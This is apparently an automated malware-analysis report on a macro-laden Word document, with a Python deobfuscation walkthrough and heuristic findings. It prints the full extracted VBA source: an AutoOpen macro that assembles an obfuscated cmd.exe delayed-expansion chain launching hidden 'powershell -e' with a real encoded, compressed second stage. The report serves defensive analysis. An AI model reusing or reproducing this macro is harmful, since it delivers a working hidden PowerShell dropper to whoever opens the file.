Verdict: MALICIOUS
Risk Score: 150

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
The sample is a malicious Word document carrying VBA macros. The `Autoopen` procedure calls `SljzT`, whose only real work is a `Shell()` call with window style `70128 - 70128`, i.e. 0 (vbHide). The command string is assembled at run time from dozens of concatenated fragments and padded with dead code (`Hex`, `Cos` and `CDate` calls on undefined variables, all silenced by `On Error Resume Next`); `Chr(vbKeyC)` supplies the leading "C" of `Cmd`. Stripped of that noise the string reads `Cmd <junk> & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set ...`: the carets are cmd.exe escape characters that hide `%comspec%` from string matching, and `/V` enables delayed expansion so that a chain of `set` commands, most of them decoys, can spell the next stage a letter or two at a time (`p`, `o^w`, `e^r`, `s`, `he`, `ll`) before `!var!!var!...` joins them into `powershell`. That is followed by `-e` and a base64 blob which decodes (UTF-16LE) to a PowerShell one-liner that inflates a second, Deflate-compressed and base64-encoded script carried in the same argument and pipes it to `&( $verbosePreference.ToString()[1,3]+'x'-join'')`, which evaluates to `iex`. The inner compressed script is not decoded on this page, so the downloader role is inferred from this staging pattern, which is typical of macro droppers, rather than confirmed.
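As an added worked example (not part of the analyzer's output or of the sample itself), the following Python reproduces the three deobfuscation steps a practitioner would apply to the Shell() string: strip cmd.exe caret escapes, emulate the `/V` delayed-expansion `set` chain to recover the program name, and decode the `-e` argument as base64 of UTF-16LE text. The `set` chain is copied verbatim from the macro's string fragments; the `-e` argument is a constructed stand-in (base64 of the UTF-16LE text `iex 1`) so the block stays short, and the macro's real argument decodes the same way. The emulator assumes the cmd.exe behaviour it models: on a cmd.exe command line an undefined `%name%` is left as-is, so `set %x%=p` defines a variable literally named `%x%`, and with `/V` a `!%x%!` reference is resolved when each `&&`-chained command executes.

```python
import base64
import re

# Constructed sample. The "set" chain is the text that the macro's aQvPhPoDb()
# concatenates, reproduced verbatim; the "-e" argument is a stand-in (base64 of
# the UTF-16LE text "iex 1") rather than the sample's real, much longer blob.
SAMPLE_CMD = (
    "Cmd nTwzpWzaWdDw ipEzAQbiMzWzBBkCP ARjYYtlS & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^%  /V "
    " /c  set %qslmvWdDzJjzpfF%=VsdsUwpUNvv&&set %HGnuERbpkl%=p&&s"
    "et %VFWpEGpZZlARO%=o^w&&set %HzQfGOzlmaLJzUw%=aVQRVMI&&set %IPXiqToY%=!%HGnuERbpkl%!&&s"
    "et %DjQswuCRYzbVDhi%=kstSzKjdYVs&&set %VnCTCUouN%=e^r&&set %KXhHjAppJmZ%=!%V"
    "FWpEGpZZlARO%!&&set %hpjKiGwb%=s&&set %OwwiavqNwpWwqjJ%=JYzuXwv"
    "jZbuJ&&set %DrojVTMiiIoGp%=he&&set %fidYWiQwar%=ll&&!"
    "%IPXiqToY%!!%KXhHjAppJmZ%!!%VnCTCUouN%!!%hpjKiGwb%!!%DrojVTMiiIoGp%!!%fi"
    "dYWiQwar%! -e aQBlAHgAIAAxAA=="
)


def strip_carets(s):
    """cmd.exe treats ^ as an escape: the caret is dropped, the next character kept."""
    return re.sub(r"\^(.)", r"\1", s, flags=re.DOTALL)


def expand_delayed(s, env):
    """Resolve !name! references the way cmd.exe /V does at execution time.

    Names here keep their literal % signs: on a cmd.exe command line an undefined
    %name% is not expanded, so "set %x%=p" defines a variable called "%x%" (assumption
    stated in the lead-in; it is what the macro's chain relies on).
    """
    return re.sub(r"!([^!]+)!", lambda m: env.get(m.group(1), m.group(0)), s)


def emulate_set_chain(cmdline):
    """Walk the &&-chained 'set' commands after /c; return (env, final command)."""
    parts = re.split(r"/c\s", cmdline, maxsplit=1, flags=re.IGNORECASE)
    if len(parts) != 2:
        raise ValueError("no '/c' command body found")
    env = {}
    commands = [c.strip() for c in parts[1].split("&&")]
    for cmd in commands[:-1]:
        m = re.match(r"set\s+(.+?)=(.*)", cmd, flags=re.IGNORECASE)
        if m:  # decoys and real letters alike; only the referenced ones matter later
            env[m.group(1)] = expand_delayed(m.group(2), env)
    return env, expand_delayed(commands[-1], env)


def decode_encoded_command(command):
    """powershell -e / -EncodedCommand takes base64 of the script as UTF-16LE."""
    m = re.search(r"\s-e(?:c|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", command,
                  flags=re.IGNORECASE)
    if not m:
        raise ValueError("no -e argument found")
    return base64.b64decode(m.group(1)).decode("utf-16-le")


def deobfuscate(cmdline):
    """Return (program, decoded script) for a Shell() string built like the macro's."""
    env, final = emulate_set_chain(strip_carets(cmdline))
    program = final.split()[0]
    return program, decode_encoded_command(final)


if __name__ == "__main__":
    prog, script = deobfuscate(SAMPLE_CMD)
    print(prog)    # powershell
    print(script)  # iex 1
```

Fed the macro's real `-e` blob instead of the stand-in, `decode_encoded_command` yields the PowerShell one-liner that inflates a second, Deflate-compressed base64 payload; that inner payload needs one more base64-decode and `zlib.decompress(data, -15)` pass before it can be read.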
Heuristics (6)

- VBA macros detected [medium] OLE_VBA_MACROS (3 related findings): document contains VBA macro code.
- Shell() call in VBA [critical] OLE_VBA_SHELL: Shell() call in VBA. Matched line in script: `IEEjn = Cos(uTvXP) SljzT = zthjv + Shell(fiZTEZv + Chr(rzYFINWIdU + vbKeyC + blFapLaXU) + aQvPhPoDb + MdBoYR + jiOWRod + ZXjoBL + zEjHZHRNrbA, 70128 - 70128) izkGjK = Hex(ooYjYO + Hex(bzfKo) * 48128 + Round(YMHzvZ))`
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro [low] OLE_VBA_AUTOOPEN: AutoOpen macro. Matched line in script: `End Function Sub Autoopen() On Error Resume Next`
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Here the rule fired even though a VBA project was recovered (see the extracted macros.bas below), so it adds no evidence beyond the AutoOpen finding.
- Embedded URL [info] EMBEDDED_URL: one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, in document text (OLE body). This is the standard DrawingML namespace URI present in any Office drawing part, not an indicator.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10046 bytes | 1710601405cb55628b4f25d401efb201960ca66a5ccd8250b06cfbfd37584470 |

Preview script (first 1,000 lines of the extracted script)

```vba
Attribute VB_Name = "wKjjNDCSzIPZR"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function SljzT()
On Error Resume Next
TYZuF = Hex(rdzJFf + Hex(UPSiLs) * 68661 + Round(nBowUm))
nzSiYE = Cos(vrpmi)
cVEimz = CDate(MNIfH)
IjWkv = Cos(owpArb)
kzTap = Hex(JsRSw + Hex(MXTja) * 83910 + Round(WXwpZG))
ButnVM = Cos(fNUsm)
FwIrN = CDate(biNVR)
IEEjn = Cos(uTvXP)
SljzT = zthjv + Shell(fiZTEZv + Chr(rzYFINWIdU + vbKeyC + blFapLaXU) + aQvPhPoDb + MdBoYR + jiOWRod + ZXjoBL + zEjHZHRNrbA, 70128 - 70128)
izkGjK = Hex(ooYjYO + Hex(bzfKo) * 48128 + Round(YMHzvZ))
wSXij = Cos(NQpUC)
WdajY = CDate(Uifuok)
qWFkcH = Cos(klpVAw)
End Function
Sub Autoopen()
On Error Resume Next
ErLJLI = Hex(CzzcjT + Hex(qhDinz) * 86595 + Round(HjNNQR))
nEjZqQ = Cos(Ukcbwn)
HHsoK = CDate(EmrNzw)
kiwzr = Cos(SMttK)
SljzT
KzMSBL = Hex(FQAYU + Hex(GXfAN) * 41472 + Round(uzGqo))
kcVLOO = Cos(LzusUp)
wqAkF = CDate(YlwmLf)
khLtV = Cos(WbakFl)
End Sub
Attribute VB_Name = "mNGdnjYT"
Function aQvPhPoDb()
On Error Resume Next
znUdCo = Hex(cVAZN + Hex(fkOtD) * 65864 + Round(XZEZaU))
CPEwA = Cos(UBCBVo)
pKoXZh = CDate(RLSfY)
SVYiu = Cos(hXRMQ)
whiWX = "md nTw" + "zpWzaWd" + "Dw i" + "pEzAQ" + "bi" + "MzWzBBkCP AR"
ZfAih = Hex(YOmAN + Hex(hAtRAr) * 95221 + Round(aoOwd))
HSGYY = Cos(XVzBCn)
GGJZRH = CDate(BuJPXZ)
rblQB = Cos(NEGHO)
wCYSzhDfuVS = "jYYtlS &" + " %^c^o^m" + "^S^p^E^c^" + "% %^c^o^m" + "^S^p^E^c^% " + " /V "
QOLArO = Hex(OrSQO + Hex(rqTMJr) * 1907 + Round(iftOlB))
PBACKp = Cos(YptSAK)
XYLWT = CDate(KuszQ)
dhiRm = Cos(MawpS)
EMDjPu = " " + "/c " + " set %qslm" + "vWdDzJjzpf" + "F%=VsdsUwpUNvv" + "&&set " + "%HGnuERbpk" + "l%=p&&s"
EHASd = Hex(qqqnL + Hex(irRsb) * 40710 + Round(DlwLJ))
XGMnjM = Cos(GzSLIs)
YGZXq = CDate(bjvoU)
djOcHw = Cos(cFMiCH)
wiokaTr = "et %VFWpEGpZZl" + "ARO%=o^w&&set" + " %HzQfGO" + "zlmaLJzUw%" + "=aV" + "QRVMI&&set %IPX" + "iqToY%=!%HG" + "nuERbpkl%!&&s"
dAlYFj = Hex(EkzLZV + Hex(NoLYTk) * 67940 + Round(rULPR))
LLcXP = Cos(sbwWi)
PZvRQh = CDate(DPRBGj)
rcIQN = Cos(STsZUo)
pcNWwkhlY = "et %" + "DjQswuCRYzbVDhi" + "%=k" + "stSzKjd" + "YVs&&set %VnCTC" + "Uo" + "uN%=e^r&&se" + "t %KXhHjAp" + "pJmZ%" + "=!%V"
Gvlpo = Hex(iUKFZD + Hex(oOAuKV) * 76710 + Round(XPThJs))
wjWwc = Cos(UHdbM)
AChXi = CDate(jCDTw)
zAQij = Cos(IfzQY)
cpkdV = "FWpEGpZZlARO%!&" + "&set %" + "hpjKi" + "Gwb%=s&&set " + "%Owwia" + "vqNwpWwqjJ" + "%=" + "JYzuXwv"
idbFTH = Hex(SwFnq + Hex(slUZqO) * 55193 + Round(IzbHmb))
TjTkd = Cos(oFlii)
wfQtNZ = CDate(ojnGHB)
vafzzh = Cos(LzRmDN)
ZPVmc = "jZbuJ&&se" + "t %DrojVTM" + "iiIoGp%=he&&" + "set %fi" + "dY" + "WiQwar%=ll&&!"
DjjvHS = Hex(CsDOit + Hex(ijaLii) * 16971 + Round(ZmhAP))
jwHKMF = Cos(AEKziP)
hbkPot = CDate(TqaUfd)
GwOHDv = Cos(twEVn)
cLDWMEXjrpG = "%IPXiqToY%!!" + "%KXhHjAppJm" + "Z%!!%Vn" + "CTCUouN%!" + "!%hpjKiGwb%!!%D" + "rojVTMiiI" + "oGp%" + "!!%" + "fi"
icPMz = Hex(QjwCR + Hex(WENHh) * 79329 + Round(cvtHwr))
UWofft = Cos(rCqbO)
MNHHu = CDate(vhrJmO)
oLGkU = Cos(UTwts)
HwtwCz = "dYWiQwar%!" + " -e KABuA" + "EUAdwAtAG" + "8AQgBqAGUAQ" + "wB0ACAAU" + "wBZAFMAd" + "ABFAG" + "0A" + "LgB" + "JAG8AL"
WXLiB = Hex(jTTUP + Hex(mNAwwd) * 25497 + Round(QQFok))
WItBO = Cos(PoXYj)
pmGvv = CDate(wSwHS)
VVjrD = Cos(RXuiA)
XKCFaHbuIbk = "gBjAE8ATQBwA" + "FIARQB" + "TAHMAS" + "QBPA"
aQvPhPoDb = whiWX + wCYSzhDfuVS + EMDjPu + wiokaTr + pcNWwkhlY + cpkdV + ZPVmc + cLDWMEXjrpG + HwtwCz + XKCFaHbuIbk
End Function
Function MdBoYR()
On Error Resume Next
ZSGvY = Hex(qbMwna + Hex(UUmsSU) * 28923 + Round(VjtnYl))
GMIGm = Cos(WdMBtA)
qLYiG = CDate(ilffbO)
hDlNIA = Cos(ZUAoj)
pWQIYs = "E4AL" + "gBkAEUAR" + "gBMAEEAVABlAF" + "MAdABSAGUA" + "YQBtACgAWwB" + "zAFkAUw" + "BU" + "AE" + "UAbQAuAEkAbwA"
NwrarY = Hex(zzKHL + Hex(cDfbhj) * 85179 + Round(ASrws))
osVLkB = Cos(hjuEo)
vnhsi = CDate(bYItt)
HnmMj = Cos(bwfiF)
wfNfMK = "uAE0AZQBtAE8AU" + "gB5AF" + "MAdAByAGUA" + "YQBtA" + "F0AIABbAEMA" + "bwBO" + "AFYARQByAFQ" + "AXQA6ADoAZgB"
zXJOuU = Hex(XtdzOT + Hex(MwRVj) * 96715 + Round(scOjVD))
dpXQhD = Cos(GtMdoI)
ZiqXt = CDate(nijKw)
CHvvi = Cos(RruDG)
QvzXwAuT = "SA" + "E8AbQBiAGEAUwB" + "lADYA" + "NABTAFQAcg" + "BpAG" + "4AZwAoACcAVgB" + "WAEIAZABTADgAT" + "gBBAEUAUAB" + "3AHIAOQAzAEMAUQ" + "BCAEoA"
hPjGDF = Hex(spGSwX + Hex(bwGwI) * 24188 + Round(ZAmLw))
DXRbWY = Cos(qdahb)
SGRvpz = CDate(awUlw)
tOHPuu = Cos(boUYi)
hALRKVfp = "cwBMAEkAaA" + "BiAGEAUQA2A" + "Go" + "AWQBGA" + "GgAKwBNA" + "EYATgBMA" + "DYAaABTAE" + "MAWAB" + "5A"
MdBoYR = pWQIYs + wfNfMK + QvzXwAuT + hALRKVfp
End Function
Function jiOWRod()
On Error Resume Next
ZNRzWY = Hex(htLHE + Hex(OaDECf) * 60543 + Round(iwjOfm))
AiltQ = Cos(XKIBzM)
NACzK = CDate(jfXjSs)
TvQiiq = Cos(AjOaOn)
aUXVlPRZP = "DUA" + "cQBjAFQAZQA3AEM" + "AWgBmAHQ" + "ARgB5AEgALw" + "AzAE4ASwBuAGcAe" + "QA4AEwAdQB" + "6AE8AegBNAEw" + "AaQAyADIAa" + "QA3AGYAN" + "wBGADMASgBEAE"
rPuDE = Hex(GOitj + Hex(iFqcv) * 36406 + Round(RabtZ))
HaYjl = Cos(lWupPd)
NZtFQX = CDate(iHjJET)
NWcPV = Cos(kzthh)
XIcwT = "4AQgB" + "4AEMAawAzA" + "DYAQgBSAEcASw" + "BGAHoAaw" + "B6AEYANgBX"
SzhoQb = Hex(PFbYVL + Hex(aoztO) * 55448 + Round(TYARZ))
IvQjLX = Cos(ECwTP)
EDClzH = CDate(zuvzz)
EbwYh = Cos(qhqUo)
iIitijbGIW = "ADYAWgByAHU" + "AeAAvAEs" + "ARA" + "BrADEAQwB" + "CAFYANwBCAEcAVA" + "BQAGsATgA2" + "AFYAQwBqAFIAeQB" + "hAHAALwBxAFIAag" + "BxAGkAVgB5AE" + "QAV"
MznRXs = Hex(djXORm + Hex(KWuNz) * 36724 + Round(tTvGdO))
YANiOq = Cos(JPhWDR)
mjNhm = CDate(MUndVV)
TisLu = Cos(iFfKfD)
iDMcp = "wAwAHkAa" + "QBxAG8A" + "VQBHAFYARwA4" + "ADIASwBYAF" + "oAUQBMAEIAQQB" + "aAEg" + "AbQBBADMAWQ" + "BYAHAAU" + "gBn" + "AFYAVABWA"
QAGMrv = Hex(KGmiZ + Hex(jlENkN) * 85595 + Round(RfXWcZ))
QHWhiq = Cos(LOama)
DNrJl = CDate(uzBRZ)
KTwUi = Cos(OVSuzP)
FZEih = "GgAMABsAFIAL" + "wBvAE0AZQB" + "TAHU" + "AbABU" + "AG8AZQB6AE0AdgA" + "0AFAAVA" + "BoAG" + "QAYgAyAF"
uAUZp = Hex(wmYYEn + Hex(kZflP) * 80185 + Round(PTXPrj))
XEBJNb = Cos(rCaYL)
afmuuj = CDate(Fpphi)
SlbdE = Cos(ICbhXP)
sKEcwzRqin = "oAdQAzAFcAMA" + "BEADgAYwAwAE" + "gATgBHAC8AS" + "ABKAEgAeAA5A" + "FcAU" + "gA4AE4A" + "WABHAEUASwB" + "zADUAcwBqAEQAOA" + "BNADAA"
LEtXFN = Hex(LWjhc + Hex(KLfiO) * 38806 + Round(EJXPYV))
CbzzOi = Cos(UPLSk)
awwBu = CDate(iXwXs)
ClmCj = Cos(wjXBjW)
RtThzt = "UAB1AHAAQwAxAFM" + "AVABD" + "ACsASwA" + "5AGU"
SzSpwT = Hex(iADGN + Hex(VYmRF) * 8293 + Round(iLtQS))
hUAwZO = Cos(QbCPi)
DdoCh = CDate(pKIazF)
fQGGEC = Cos(MmvdD)
dPamZia = "ANgA0AE8AWQB0AG" + "YAKwA3AHUAV" + "wBmAHgAbwB" + "LAFEAaABV"
roFtVW = Hex(EAdqJL + Hex(cYZuDq) * 58310 + Round(IJVwNL))
RhKwDp = Cos(FOEaW)
imQzsT = CDate(oMBaNz)
fvYWJ = Cos(QivfK)
NRQMquFflW = "ADgA" + "VA" + "BJ" + "ADkAWABxAG" + "wAaQBoAE4AK"
ubTKp = Hex(UnEWtY + Hex(uQzEj) * 68901 + Round(EjVJpi))
wZvqk = Cos(kYSVCM)
sLEICA = CDate(PHRiP)
ZENFJU = Cos(MWNIf)
Gtojlzjw = "wByAGgAQg" + "BpAC" + "8AYgBVADkAag" + "BlAHkAdQBUAG4A" + "bwAwAG8AaABzA" + "HEA" + "VQBvAD" + "QAVQA5AG4AYQBK" + "AEcAaQBWA" + "HoAdgAxAGc"
jiOWRod = aUXVlPRZP + XIcwT + iIitijbGIW + iDMcp + FZEih + sKEcwzRqin + RtThzt + dPamZia + NRQMquFflW + Gtojlzjw
End Function
Function ZXjoBL()
On Error Resume Next
lVVzd = Hex(Tmssc + Hex(GpRBq) * 16443 + Round(boNjL))
LhFlW = Cos(vdtPvt)
nbwKj = CDate(ksCfp)
fFqEU = Cos(pJkSU)
mPbtAhc = "AUgBBAG" + "IATABnAE" + "MAYwB" + "vA" + "EwASQBZ" + "AHIAYQB5AFE" + "AMAB" + "6AFgAb"
AWujj = Hex(aWHhV + Hex(fihUaU) * 16831 + Round(ParsF))
YrFkY = Cos(HhJKR)
JpFTD = CDate(kAZqqV)
QJRwZf = Cos(bKoiQ)
UtWbnU = "gBNAFUAMgBlAHkA" + "NQBaADAAVQBLA" + "EkAdgAyAFkAQg" + "BWAEMAVwBKAG" + "cARw" + "BDAGYAMQBnA" + "GkANgBP" + "AEUARwBwAFYAN" + "wBSAHUAdwBVAEk"
IAizU = Hex(CWLTz + Hex(XsIEzi) * 965 + Round(AHLqik))
PcwAWC = Cos(pkScVT)
MFqUD = CDate(mtWKG)
jWAosO = Cos(rmuMSb)
pRRrF = "AZwBmAGUA" + "ZABkADgAPQA" + "nACAAKQAsACAA" + "WwBzAF" + "kAUw" + "BUAGUATQAuAEk" + "Abw" + "AuAE" + "MAbwBNAFA" + "AU"
rDYmXM = Hex(QoCVWf + Hex(tWFotn) * 42153 + Round(ovZNl))
jSsXsK = Cos(jVjmu)
QiwTW = CDate(CwQoYY)
WiOcNK = Cos(EkWJzd)
BstFCGhPM = "gBlAF" + "MAUwBpAE8A" + "bgAuAGMAb" + "wBtAHAAUgBl" + "AHMAcwBJ" + "AG8ATgB" + "NAG8ARABlA" + "F0AOgA6AEQAZQBD" + "AE8ATQBQAFI"
YJAWB = Hex(mFaqcD + Hex(idPdUw) * 10311 + Round(bUsWcT))
fMoVsM = Cos(oPRWZB)
HXAJi = CDate(bUsozX)
wpIzYj = Cos(ZOCGKS)
wIJrjnfBEB = "AZQBzAFMAKQ" + "B8AEYAbwBSA" + "EUAYQ" + "BDAGgAewAgAG4A" + "RQB3AC0AbwBCAGo" + "AZQBDAHQAIA" + "Bp" + "AG8ALgBzAHQAc"
oALwZ = Hex(VTzrN + Hex(aVLTzW) * 40507 + Round(hzHSzs))
rsVuw = Cos(omUjq)
TMcsQ = CDate(bGTOuC)
poWpst = Cos(jsdbb)
fawVXVBIBa = "gBFAGEATQBSAG" + "UAQQBEAGUAUg" + "AoACAAJABfACAAL" + "AB" + "bAFQARQB4" + "AH" + "QALgB" + "FAG4AQwBPAEQ"
Okmjqn = Hex(wBRFH + Hex(fWmsdw) * 36554 + Round(JYRzb))
ptbiBQ = Cos(XqTkX)
snoWR = CDate(CNitzA)
InFMUl = Cos(AUDZi)
RnpMap = "ASQB" + "OAEcAXQA6ADo" + "AQQBTA" + "EMASQ" + "BpACkAIAB9" + "AHwA" + "IABmAE8AcgBlA" + "EEAQwBIACAAewA" + "kAF8ALgBSAE" + "UAQQBkAFQATwBFA"
ZXjoBL = mPbtAhc + UtWbnU + pRRrF + BstFCGhPM + wIJrjnfBEB + fawVXVBIBa + RnpMap
End Function
Function zEjHZHRNrbA()
On Error Resume Next
qXHjT = Hex(GqaWU + Hex(zPZZK) * 99046 + Round(iYIfSd))
wIGYjO = Cos(OriFwa)
tmiRkK = CDate(WpbJE)
ziispC = Cos(JwkBm)
jitpJziz = "G4AZAAoACkAf" + "QApACAA" + "fAAm" + "ACgAIAA" + "kAHYAR" + "QByAEIATwB" + "zAGUAUAByAE"
NlYuT = Hex(ZlomZ + Hex(hTdcS) * 60211 + Round(fRojI))
QwGhvB = Cos(iiwjzu)
zfMLs = CDate(iHiqj)
EmHoZC = Cos(IDQSD)
bWrMsbrXqb = "UARgBFAHIAZ" + "QBO" + "AGMA" + "ZQAuAF" + "QAbwBTAFQAUgB" + "JAE4ARwAoACkA" + "WwAxACwAMwB" + "dACs"
ksjDXu = Hex(YXRAFc + Hex(zIINPB) * 31126 + Round(uXqWhi))
EhMJSH = Cos(uELwB)
hVGiz = CDate(PzvCD)
cnwLM = Cos(NwmTk)
QDoRaakXsuG = "AJ" + "wB4AC" + "cALQBqA" + "E8ASQBuAC" + "cAJwApAA=="
zEjHZHRNrbA = jitpJziz + bWrMsbrXqb + QDoRaakXsuG
End Function
```